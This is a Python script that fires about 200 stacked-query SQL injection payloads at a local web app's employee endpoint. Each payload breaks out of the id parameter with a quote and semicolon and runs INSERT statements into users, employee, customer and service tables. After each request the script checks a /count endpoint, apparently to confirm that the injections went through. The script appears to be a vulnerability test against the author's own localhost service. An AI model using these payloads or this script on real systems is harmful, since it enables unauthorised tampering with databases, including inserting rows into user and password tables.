import time
import requests

data_set = ['\\"; INSERT INTO service(price) VALUES (946)#',
            '\\"; INSERT INTO employee(fname, id_card) VALUES ("koMfvHEM", 1710347408558)# ',
            '\\"; INSERT INTO service(name) VALUES ("KjVDMrobDuZt")# ',
            '\\"; INSERT INTO users(password) VALUES ("nhiR89")#',
            '\\"; INSERT INTO service(price) VALUES (275)#',
            '\\"; INSERT INTO users(password) VALUES ("zR8XJs")# ',
            '\\"; INSERT INTO users(username) VALUES ("dqnSyq")-- ',
            '\\"; INSERT INTO employee(prefixname, lname, id_card) VALUES ("epYChyRbJOSDan", "IKRIPfiyd", 1556188647338)#',
            '\\"; INSERT INTO service(name) VALUES ("tzxEGWoCsBmVG")# ',
            '\\"; INSERT INTO employee(fname, house_registration, work_background, tel) VALUES ("mRoOJGNd", "1G4BYgdFqoz5", "RrAIuypcXXQ", 0910352949)-- ',
            '\\"; INSERT INTO service(price) VALUES (216)#',
            '\\"; INSERT INTO users(password) VALUES ("Qx4lYZ")# ',
            '\\"; INSERT INTO users(username) VALUES ("PeclH")#',
            '\\"; INSERT INTO service(price) VALUES (191)-- ',
            '\\"; INSERT INTO users(password) VALUES ("8TYxZiPxGSBrgn")-- ',
            '\\"; INSERT INTO employee(prefixname, email, address, tel, fname) VALUES ("WFcjfZfDMXmF", "JHfzUrrI", "YXxD6qU6y6trtG9", 0624551782, "gBowCfyUXEoTTV")-- ',
            '\\"; INSERT INTO service(price) VALUES (233)#',
            '\\"; INSERT INTO customer(customer_id, fname, lname) VALUES ("msHKU70vU", "hpsZEuGtdocEaC", "Upvlvyklfw")-- ',
            '\\"; INSERT INTO service(price) VALUES (173)# ',
            '\\"; INSERT INTO employee(tel, graduation_certificate, house_registration, lname, prefixname, nickname, address) VALUES (0374633001, "VPCIyLuh6", "zCNI", "wYSfa", "GwCIibYV", "UtPsuS", "pxN5jt4")#',
            '\\"; INSERT INTO employee(nickname) VALUES ("Gwdh")#',
            '\\"; INSERT INTO employee(employee_id, tel, lname, fname, email, address, id_card, prefixname, nickname) VALUES ("5AXoEf7Osj33vFP", 0949865291, "fSVAXlSW", "RTlDkm", "yndae", "unBd", 1943202475625, "MeDjKZaGyXBny", "uJEbiOdIyWe")# ',
            '\\"; INSERT INTO customer(lname) VALUES ("wofbSUVb")-- ',
            '\\"; INSERT INTO customer(customer_id, fname) VALUES ("VnEKlu", "NNQggweFIftk")-- ',
            '\\"; INSERT INTO users(username) VALUES ("VEbPhYFr")#',
            '\\"; INSERT INTO service(name) VALUES ("FQWReLHEBkI")-- ',
            '\\"; INSERT INTO employee(email, prefixname) VALUES ("X7zN5376", "yxewtjkfXHPH")-- ',
            '\\"; INSERT INTO service(price) VALUES (548)# ',
            '\\"; INSERT INTO service(price) VALUES (171)# ',
            '\\"; INSERT INTO service(name) VALUES ("xyJnYT")#',
            '\\"; INSERT INTO users(username) VALUES ("NTzNICWMhRftDt")#',
            '\\"; INSERT INTO customer(customer_id, lname) VALUES ("EW2gK", "TwOkY")# ',
            '\\"; INSERT INTO service(price) VALUES (658)-- ',
            '\\"; INSERT INTO service(name) VALUES ("ntgCnosaURehgnD")# ',
            '\\"; INSERT INTO employee(graduation_certificate, work_background, employee_id, nickname, house_registration, address, fname, id_card, tel) VALUES ("kl3cDIxXiBIn", "Fi8jpQSv1z", "77jqBKouDUW4kr8", "hGUOwaVuFuMFLdp", "Vq7BDHXTS", "bucOwt", "psLi", 1952985029585, 0905452412)-- ',
            '\\"; INSERT INTO users(username) VALUES ("QfAW")-- ',
            '\\"; INSERT INTO users(password) VALUES ("cSQSm1caoVTT23")# ',
            '\\"; INSERT INTO employee(tel) VALUES (0920117223)#',
            '\\"; INSERT INTO users(password) VALUES ("fh4ww5quG")-- ',
            '\\"; INSERT INTO service(price) VALUES (533)# ',
            '\\"; INSERT INTO users(username) VALUES ("SnOVD")# ',
            '\\"; INSERT INTO customer(lname, email, customer_id, tel) VALUES ("psiX", "pUj3HsOdM", "afkIecf5", 0367915787)#',
            '\\"; INSERT INTO service(price) VALUES (231)# ',
            '\\"; INSERT INTO users(password) VALUES ("GLyhaLTEF")#',
            '\\"; INSERT INTO users(username) VALUES ("EoRKCfVcOMACO")#',
            '\\"; INSERT INTO service(price) VALUES (805)# ',
            '\\"; INSERT INTO employee(nickname, graduation_certificate, fname, employee_id, prefixname, work_background, house_registration, lname) VALUES ("iQIXkMfMqUpLb", "tOAXkzG", "WCImCSbuhDg", "MqX1tVcYD", "qxNHejrX", "9R7voi", "DowzY1vJ", "gYxwEyxIJ")#',
            '\\"; INSERT INTO employee(employee_id, nickname, lname, house_registration, tel, fname, graduation_certificate, address, email, work_background, prefixname) VALUES ("lLXikaMuNagqqn", "weJxKhVMAgxlxQ", "FDoxjGlOARxJLz", "Rm7crCKEvRx", 0102088172, "lvScULCJ", "XAATvo1tbV94dk", "O3LQoGi9HT", "5XoWbeW", "aGGTMwf", "hHPMsKsBvoj")#',
            '\\"; INSERT INTO customer(customer_id, lname) VALUES ("Sq2y7PTrTw56", "sYsECNERwzOih")# ',
            '\\"; INSERT INTO service(price) VALUES (755)# ',
            '\\"; INSERT INTO users(password) VALUES ("EliO0FXq")# ',
            '\\"; INSERT INTO users(username) VALUES ("LfjgqgGN")-- ',
            '\\"; INSERT INTO employee(fname, prefixname, graduation_certificate, address, id_card, nickname, house_registration, work_background, lname, email) VALUES ("WKQYQkYdfqWrQ", "MGnIkF", "uGUlDg1mG", "mPmC9qSGKu9e", 1908736413269, "SNfBqeLNRqiBCj", "oHnWVptA8HzrAf9", "fgyXp2rPt2gW8", "gJziDvyduJMFSc", "BVk9")# ',
            '\\"; INSERT INTO customer(tel) VALUES (0955565938)-- ',
            '\\"; INSERT INTO customer(tel) VALUES (0661905683)# ',
            '\\"; INSERT INTO customer(email, fname) VALUES ("vGAVQRhIDV2n", "VikUs")-- ',
            '\\"; INSERT INTO customer(lname, customer_id) VALUES ("MpJm", "TM1OxATgaeedrJ4")#',
            '\\"; INSERT INTO service(price) VALUES (240)#',
            '\\"; INSERT INTO employee(address, graduation_certificate, prefixname, house_registration, email, tel, id_card, fname) VALUES ("sCUnLTzxRx", "uAArgkXWsOsBa69", "VXPqrIfdeTd", "YN2faGYCQUXmQCe", "mgIcGzwUMOR", 0957952833, 1635243351589, "TiBzklo")# ',
            '\\"; INSERT INTO service(price) VALUES (948)# ',
            '\\"; INSERT INTO customer(fname, tel, customer_id) VALUES ("JcaLzlTrBWrC", 0109842051, "UYflIZ")# ',
            '\\"; INSERT INTO employee(address, fname, house_registration, email, tel, graduation_certificate, prefixname, work_background, employee_id, lname, nickname) VALUES ("HLpdA", "DwveBgGtgIV", "yXPzoEOejaYBHtc", "RJhd68A9lMkj", 0292650202, "ElYts", "hshFDGKIKkmwmN", "Y45jNIuW2Q", "KmYEsWl", "ePfNa", "wKqFDvTrkq")#',
            '\\"; INSERT INTO customer(fname, customer_id) VALUES ("wMdLHSWCpqYy", "a2FFg")# ',
            '\\"; INSERT INTO service(price) VALUES (558)# ',
            '\\"; INSERT INTO service(price) VALUES (697)-- ',
            '\\"; INSERT INTO customer(fname, lname, tel, customer_id) VALUES ("KsHFgkvLNOX", "sFrQkMWiTbOBV", 0414965406, "FIE88VXvxTNJIW")-- ',
            '\\"; INSERT INTO customer(fname) VALUES ("kAcC")# ',
            '\\"; INSERT INTO employee(email, house_registration, employee_id, work_background, lname, tel, address) VALUES ("pwhXqRq", "f0S2SKd", "nGKWfhM", "8NnfRFB", "ShnRCek", 0316719566, "Vz6WJQL22")#',
            '\\"; INSERT INTO users(username) VALUES ("cGAabZMJazXsNf")# ',
            '\\"; INSERT INTO employee(lname, address, nickname, tel, house_registration, id_card, employee_id, work_background) VALUES ("qKFuunOv", "jTMvycABEfdE0", "JkitjraQGPeg", 0758044381, "d4Zq9cVFz", 1704845195842, "cKHbJUZwC3", "2rWQ6XUWl")# ',
            '\\"; INSERT INTO customer(customer_id, tel) VALUES ("juxkM5ucp", 0433439468)# ',
            '\\"; INSERT INTO service(name) VALUES ("DFwbWw")# ',
            '\\"; INSERT INTO customer(customer_id, fname, email, lname) VALUES ("tifPYNG9jas", "PwJOmx", "xsjumdg1eQytL1", "VEeCzgY")#',
            '\\"; INSERT INTO service(price) VALUES (605)-- ',
            '\\"; INSERT INTO employee(work_background, email, address, prefixname, id_card, graduation_certificate, employee_id, lname, fname, tel, nickname) VALUES ("mFPJwtrBpo9O4", "SHVsXXbIybWLo", "syDWl", "DpGTtEq", 1849680895482, "zWdv", "KNEKIK", "viSFoRoYRYpku", "CWmi", 0865619288, "IgyVKOANGbLaCU")-- ',
            '\\"; INSERT INTO customer(email, tel, lname) VALUES ("uHsvAHD9KNN0", 0955571831, "swHmb")#',
            '\\"; INSERT INTO service(name) VALUES ("jXVmvF")#',
            '\\"; INSERT INTO employee(email, employee_id, graduation_certificate, address) VALUES ("8myv2KEzG", "CjhIXCwnyUUjF", "FiTU", "s5PSDJeQsdi")-- ',
            '\\"; INSERT INTO employee(graduation_certificate, fname, work_background, email, nickname, id_card, lname, house_registration, prefixname, tel) VALUES ("TtG0gS", "qmfGKrlmyxa", "EY4Sv", "R6cv1xgX5wgM4", "JKIZcrcp", 1921252413786, "cdVXOshfc", "pdhoBxn", "PGKLx", 0668825342)-- ',
            '\\"; INSERT INTO customer(customer_id, lname) VALUES ("14kFiLNF", "sfNJuVtL")-- ',
            '\\"; INSERT INTO service(price) VALUES (599)# ',
            '\\"; INSERT INTO customer(customer_id) VALUES ("2wEC02P4GEY")# ',
            '\\"; INSERT INTO users(password) VALUES ("IQC9mpiLJm9Es")-- ',
            '\\"; INSERT INTO customer(lname, fname, email, customer_id) VALUES ("fTnlxoQGSG", "pYXOIuLFL", "VPiSOJZQN5MnK", "ytFD8")# ',
            '\\"; INSERT INTO service(name) VALUES ("HvJFtLv")# ',
            '\\"; INSERT INTO service(name) VALUES ("yjWCUu")#',
            '\\"; INSERT INTO employee(fname, prefixname) VALUES ("FWEpKL", "BCikYtpmybxQn")# ',
            '\\"; INSERT INTO users(password) VALUES ("2E1Vmv")-- ',
            '\\"; INSERT INTO users(username) VALUES ("XUVohVAXUBBqqj")# ',
            '\\"; INSERT INTO customer(fname, tel) VALUES ("bePRkGfnCdHNxfn", 0184643368)# ',
            '\\"; INSERT INTO service(name) VALUES ("DBJmkZKrf")-- ',
            '\\"; INSERT INTO service(name) VALUES ("lFvSXvLPPIIeLr")# ',
            '\\"; INSERT INTO service(price) VALUES (080)#',
            '\\"; INSERT INTO employee(nickname, id_card, fname, tel) VALUES ("aWjQVtNZ", 1760019412998, "BJOhSw", 0800967556)#',
            '\\"; INSERT INTO service(price) VALUES (127)#',
            '\\"; INSERT INTO employee(employee_id, fname, work_background, address, prefixname, nickname) VALUES ("2bAmecC0Mi", "gNMbwtFxYUou", "JBiHIjbOl", "FfQS", "jGqdsmzRggGUw", "xvfvDbVkFinVUwV")#',
            '\\"; INSERT INTO service(name) VALUES ("KFdinq")-- ',
            '\\"; INSERT INTO customer(fname, lname) VALUES ("yXPMpU", "cimNDCdUvgMR")-- ',
            '\\"; INSERT INTO employee(work_background, graduation_certificate, email, lname, nickname, address, id_card, house_registration, tel) VALUES ("KiFXVeRgrfa", "H6Zu9JC", "u7QgvAEtF5fd", "iHTqqPp", "sBKYSHbxBS", "rkBCnq", 1531391274384, "mrog6", 0758799998)# ',
            '\\"; INSERT INTO employee(employee_id, id_card, work_background) VALUES ("6aoeC2nqBt2Kk", 1990157435603, "bUMRcf")# ',
            '\\"; INSERT INTO customer(email, customer_id, tel, fname) VALUES ("LKx3TZ5YDyHuq9", "Ma3KKwyFd92Vc", 0574577375, "CaMmocWHDDKj")# ',
            '\\"; INSERT INTO service(price) VALUES (672)-- ',
            '\\"; INSERT INTO customer(fname, customer_id, lname, email) VALUES ("QLAGeXMDqLqq", "OTa4el1V", "gyNMGmDqxNQKYo", "XgpzATQrogasqw3")#',
            '\\"; INSERT INTO employee(tel) VALUES (0314845855)-- ',
            '\\"; INSERT INTO employee(address, nickname, house_registration, graduation_certificate, employee_id, fname, work_background, email, lname, tel) VALUES ("MnLOWWfvGqgu", "gjJxJvnb", "6zKslRYxO", "V9qBC6ukJd7hC8o", "qCZjDpNmge", "QQIpLSuKrWnTf", "2QHem274l", "YXdOke", "tZQByFUDmSsiv", 0526200489)-- ',
            '\\"; INSERT INTO service(name) VALUES ("yuJtoaTV")#',
            '\\"; INSERT INTO customer(fname, lname, email) VALUES ("mVEalUEWjw", "PkbGs", "6B35GLmqzQzHbS")#',
            '\\"; INSERT INTO employee(fname, prefixname, nickname, id_card, tel, graduation_certificate, work_background, email, house_registration, lname, employee_id) VALUES ("dXZJi", "hwjcLYih", "VghzXp", 1921957842801, 0741009119, "EHdjKbrlR", "kFT61HCv", "m3J0yzD", "xlv0fkxDbagPT", "QUwE", "2yCvHA")# ',
            '\\"; INSERT INTO service(name) VALUES ("eVBWM")#',
            '\\"; INSERT INTO users(password) VALUES ("Z9DUu")-- ',
            '\\"; INSERT INTO customer(tel) VALUES (0913328553)# ',
            '\\"; INSERT INTO service(name) VALUES ("EQKmzAp")-- ',
            '\\"; INSERT INTO customer(lname, tel, email) VALUES ("rqHyKLkNKQ", 0359560388, "Q6N2j")-- ',
            '\\"; INSERT INTO users(password) VALUES ("iK7RQ")-- ',
            '\\"; INSERT INTO employee(address, nickname, employee_id, graduation_certificate) VALUES ("IXVSfO0wiUD", "DHPUbfYsA", "oPR2na", "0ph4qEH")-- ',
            '\\"; INSERT INTO service(name) VALUES ("dxCySrcgIBpTNQ")#',
            '\\"; INSERT INTO employee(employee_id, address) VALUES ("dhWeOnYY", "Sb2vfklxNjRF")# ',
            '\\"; INSERT INTO employee(fname, graduation_certificate, house_registration, prefixname) VALUES ("jsZBFvSrwjhG", "sAgtXVpuZuX", "KYgR7uf", "WWrHsDWmmELa")# ',
            '\\"; INSERT INTO service(name) VALUES ("aIoocTlqQgZM")#',
            '\\"; INSERT INTO users(username) VALUES ("ipnLoIFKfyRMRv")-- ',
            '\\"; INSERT INTO users(username) VALUES ("JzTDN")# ',
            '\\"; INSERT INTO service(price) VALUES (675)#',
            '\\"; INSERT INTO service(name) VALUES ("mMpXjFSCUVMl")#',
            '\\"; INSERT INTO service(name) VALUES ("kuHxEbnrJFOf")#',
            '\\"; INSERT INTO employee(email, fname, tel, prefixname, nickname, id_card) VALUES ("t8pFbyVUGp", "IYTGLcmGeM", 0536970255, "MjNqJKSFzRg", "NvIkAKasGJpaJX", 1512864698646)#',
            '\\"; INSERT INTO service(name) VALUES ("NjsElRY")-- ',
            '\\"; INSERT INTO users(username) VALUES ("tCqagNucvmiLvTO")#',
            '\\"; INSERT INTO customer(lname, fname, tel, email) VALUES ("cqUB", "GokKfry", 0533842855, "Spa4scRFPgY")-- ',
            '\\"; INSERT INTO employee(nickname, email, fname, house_registration) VALUES ("sRpfYgq", "rCh5678jdj3", "zVubZ", "kL4vx5aPS4Oan2n")# ',
            '\\"; INSERT INTO users(username) VALUES ("YqcNseWkR")-- ',
            '\\"; INSERT INTO service(name) VALUES ("SIDF")-- ',
            '\\"; INSERT INTO employee(tel, graduation_certificate, email, employee_id, work_background, nickname, lname, house_registration, fname, id_card) VALUES (0783915536, "KotosyRJA", "BBrjfbjF8aVG6", "2kRiTswAZBHnu", "F4KPu", "MdshC", "srBBI", "TJYQM", "FmIlanfpXTMWig", 1788665789890)-- ',
            '\\"; INSERT INTO service(name) VALUES ("xyeqTMLLUHIg")# ',
            '\\"; INSERT INTO service(price) VALUES (523)# ',
            '\\"; INSERT INTO users(password) VALUES ("RjkCeif9C443tRF")# ',
            '\\"; INSERT INTO service(price) VALUES (099)-- ',
            '\\"; INSERT INTO users(password) VALUES ("WpL3MLPtSMb")# ',
            '\\"; INSERT INTO employee(prefixname, nickname, work_background, email, lname, id_card, fname) VALUES ("sZRrMdf", "jQbedieZakVYQi", "eGcbWLmDOmt3MG0", "0yq8ZOkMhS8JsEd", "WoBfQzNz", 1605943830557, "sAkrHkhFmAF")-- ',
            '\\"; INSERT INTO service(name) VALUES ("kNoB")-- ',
            '\\"; INSERT INTO users(password) VALUES ("7liT")#',
            '\\"; INSERT INTO employee(fname, tel, nickname) VALUES ("HPoHkFCjrUQBp", 0374220488, "MwvJ")-- ',
            '\\"; INSERT INTO customer(email, customer_id, tel, fname) VALUES ("XSoT3Qcv0lX", "U3u2BNbcpFZj2B1", 0565071832, "lIEU")-- ',
            '\\"; INSERT INTO customer(email) VALUES ("UR34KpaKh")-- ',
            '\\"; INSERT INTO customer(fname, customer_id) VALUES ("sDIyFeNl", "ebcgRB4Llk")-- ',
            '\\"; INSERT INTO users(username) VALUES ("BLUtUrITMr")# ',
            '\\"; INSERT INTO users(username) VALUES ("ltsmCLJQUnxgEY")# ',
            '\\"; INSERT INTO employee(nickname, prefixname, fname, house_registration, id_card, work_background) VALUES ("NsaQRyPXYrIbXzd", "JSSI", "LBrzosv", "GuIxMkzIaf9Ot0d", 1837289077906, "ZHzGNIEXIw78sVA")# ',
            '\\"; INSERT INTO customer(tel, email, fname) VALUES (0630084006, "BhjOiq1f0MjgjF", "YlmJKpTKQe")-- ',
            '\\"; INSERT INTO users(password) VALUES ("wmcso")-- ',
            '\\"; INSERT INTO employee(prefixname, email) VALUES ("wdMjiqkANnSFOtA", "jfjjQbvgwRKF5M7")#',
            '\\"; INSERT INTO users(username) VALUES ("qwnYyBlVOpS")#',
            '\\"; INSERT INTO users(password) VALUES ("LIo0rfdD4abX")-- ',
            '\\"; INSERT INTO service(name) VALUES ("DrYKDJWYMcr")-- ',
            '\\"; INSERT INTO customer(fname, customer_id) VALUES ("WqDrCTdzl", "9OGYGVH8pFXcwbn")#',
            '\\"; INSERT INTO users(password) VALUES ("eitCUu5HaKF")-- ',
            '\\"; INSERT INTO employee(email, nickname, employee_id, lname, id_card) VALUES ("9ZcSb5xmj6T", "KgMLy", "Ehl78WqbWm3VTqI", "qSFRtKqWJfvkaj", 1893151047510)# ',
            '\\"; INSERT INTO service(name) VALUES ("kPjbVOLbJpAyePc")# ',
            '\\"; INSERT INTO customer(tel, customer_id, lname) VALUES (0219893545, "9aESOG2h1N3aJ1", "dRdyh")# ',
            '\\"; INSERT INTO customer(email, customer_id, fname, lname) VALUES ("sA6yxbB3s", "WGQ6n9", "wgdTczvLpRplnI", "kCRQanIQYVUqT")-- ',
            '\\"; INSERT INTO customer(lname, tel, fname) VALUES ("PuUksgtGHmw", 0646394090, "CtQJHVfLOhmqz")#',
            '\\"; INSERT INTO users(username) VALUES ("CeuiijWGc")-- ',
            '\\"; INSERT INTO employee(fname, work_background, nickname, id_card, address, prefixname, tel, house_registration, email) VALUES ("dxAe", "dIjP", "jVlJZxip", 1945767368052, "LY1Q3rehkbZe9XH", "AUJoYiErR", 0815184299, "ondfVI", "hDsn9")# ',
            '\\"; INSERT INTO service(price) VALUES (827)-- ',
            '\\"; INSERT INTO customer(customer_id, email, tel) VALUES ("QddgH", "dt8cYd4lcpfpAk", 0367907868)# ',
            '\\"; INSERT INTO users(username) VALUES ("gIXgsrMeioYX")# ',
            '\\"; INSERT INTO employee(address, tel, prefixname, employee_id, graduation_certificate, email, nickname, fname) VALUES ("jxArNv", 0800745818, "refHvC", "jOhasjds6GLy", "77rO", "8NDvnBdSM", "VIFqAtteVBcy", "OefcUavango")-- ',
            '\\"; INSERT INTO employee(house_registration, lname, graduation_certificate, fname, email, id_card, nickname, address, employee_id) VALUES ("ANFJ", "qbqyQQfuFC", "ZPW382NkutrGV8r", "bukvLPJHyKu", "Jv0hRMDwum", 1827623163094, "MRapaIkXCiMDo", "Iaw4B8Xkk", "rZxqcBIe")-- ',
            '\\"; INSERT INTO service(name) VALUES ("SmBwy")#',
            '\\"; INSERT INTO customer(customer_id, lname) VALUES ("0qw7m", "CZuj")-- ',
            '\\"; INSERT INTO customer(fname, lname, email, customer_id) VALUES ("QRHCemNIqwfyv", "rRyKJCi", "Q2aWZNTj", "swvyAsyY5")#',
            '\\"; INSERT INTO users(password) VALUES ("dkok")#',
            '\\"; INSERT INTO service(price) VALUES (440)-- ',
            '\\"; INSERT INTO service(price) VALUES (289)-- ',
            '\\"; INSERT INTO customer(email) VALUES ("FKxBwTjHeN")-- ',
            '\\"; INSERT INTO customer(fname) VALUES ("cnrBby")#',
            '\\"; INSERT INTO employee(id_card, tel, employee_id) VALUES (1822019147761, 0683785984, "9Vf08A6duk5tO")-- ',
            '\\"; INSERT INTO service(price) VALUES (808)-- ',
            '\\"; INSERT INTO employee(house_registration, graduation_certificate, lname, work_background, tel) VALUES ("i2Cj5IvOF", "orTwpfdT", "FWXPoleC", "MtxRr4F4F", 0265759668)#',
            '\\"; INSERT INTO employee(email, fname, id_card, nickname, prefixname, employee_id, house_registration, tel) VALUES ("qgcoOr57g6W", "BJwBnsjoiMNxe", 1959622296374, "CUDVMPbCsa", "ZkONuUHBEzdiDw", "mJOdW", "wGx1BmfB1", 0248335778)# ',
            '\\"; INSERT INTO service(price) VALUES (883)# ',
            '\\"; INSERT INTO employee(graduation_certificate, tel, fname, employee_id, email, prefixname, address, nickname, id_card, work_background) VALUES ("FwH8CiuWJpE", 0124476693, "KAMsn", "Y15d1ClNnwFHM", "m4G7I", "zCxmuF", "MvvX8tSTy5LhZ", "tZFuBtrYHtj", 1873774996206, "SKIEiXUP2R9k")-- ',
            '\\"; INSERT INTO employee(house_registration, work_background, tel) VALUES ("4BPVP8E", "U6lARpBDfyP", 0844858963)-- ',
            '\\"; INSERT INTO service(name) VALUES ("oxbajmvB")# ',
            '\\"; INSERT INTO customer(customer_id) VALUES ("LvWTbX61RSd")#',
            '\\"; INSERT INTO service(name) VALUES ("oxqIA")# ',
            '\\"; INSERT INTO employee(employee_id) VALUES ("MyMv582SHxX4")# ',
            '\\"; INSERT INTO employee(nickname, fname, lname, id_card, tel, employee_id, work_background, address, house_registration) VALUES ("oxBMTNCnDAzwGOw", "GdjuVzcN", "MRzXlmYTqv", 1671552174169, 0953464590, "8qLJ947", "teYlXJFOxM", "ffmQ91", "tQXORQd235SnS")# ',
            '\\"; INSERT INTO customer(customer_id, email, fname) VALUES ("thZBoOgHCvh", "jXBBVKR4eef5JWH", "AXoXNgke")-- ',
            '\\"; INSERT INTO service(name) VALUES ("QDtunsyx")# ',
            '\\"; INSERT INTO customer(tel, lname) VALUES (0892583525, "WQObdAafKrXzIyB")#',
            '\\"; INSERT INTO service(price) VALUES (053)-- ',
            '\\"; INSERT INTO users(username) VALUES ("uSRKWvZ")# ',
            '\\"; INSERT INTO employee(graduation_certificate, email, lname, fname, prefixname, work_background, address) VALUES ("bs8iFO", "G9qFdo", "BwLLzMZseJoKojZ", "jAwtzRMrr", "BgMwn", "gKuRPhWLTid", "NdAiCkGuR")-- ',
            '\\"; INSERT INTO customer(fname, customer_id, lname, email) VALUES ("vRcNhTDcF", "jI8fQhB", "xROhT", "8A1r")-- ',
            '\\"; INSERT INTO users(username) VALUES ("vIWRAYEuorq")# ',
            '\\"; INSERT INTO users(username) VALUES ("stwguvy")#',
            '\\"; INSERT INTO service(price) VALUES (269)-- ',
            '\\"; INSERT INTO employee(email, employee_id, lname, work_background, house_registration, graduation_certificate, prefixname, tel, id_card) VALUES ("KkTVF", "TFdiBF", "pputN", "lzKKw35Mh4tp", "zsBxaJaoxMB", "lfX1q0AKlUm", "OCeqifwx", 0980571410, 1862766168736)#',
            '\\"; INSERT INTO users(password) VALUES ("IQzEeUE2JfBbJ")-- ',
            '\\"; INSERT INTO users(password) VALUES ("p7RH0")-- ']


def fetch_data(data):
    try:
        response = requests.get("http://127.0.0.1:3000/employee?id=" +
                                data, headers={"Content-Type": "application/json"})
        # api_json_data = response.json()
        # print(api_json_data)
    except Exception as e:
        print(e)


def fetch_count():
    try:
        response = requests.get(
            "http://127.0.0.1:3000/count", headers={"Content-Type": "application/json"})
        api_json_data = response.json()
        print(api_json_data)
    except Exception as e:
        print(e)


for data in data_set:
    fetch_data(data)
    # time.sleep(2)
    fetch_count()
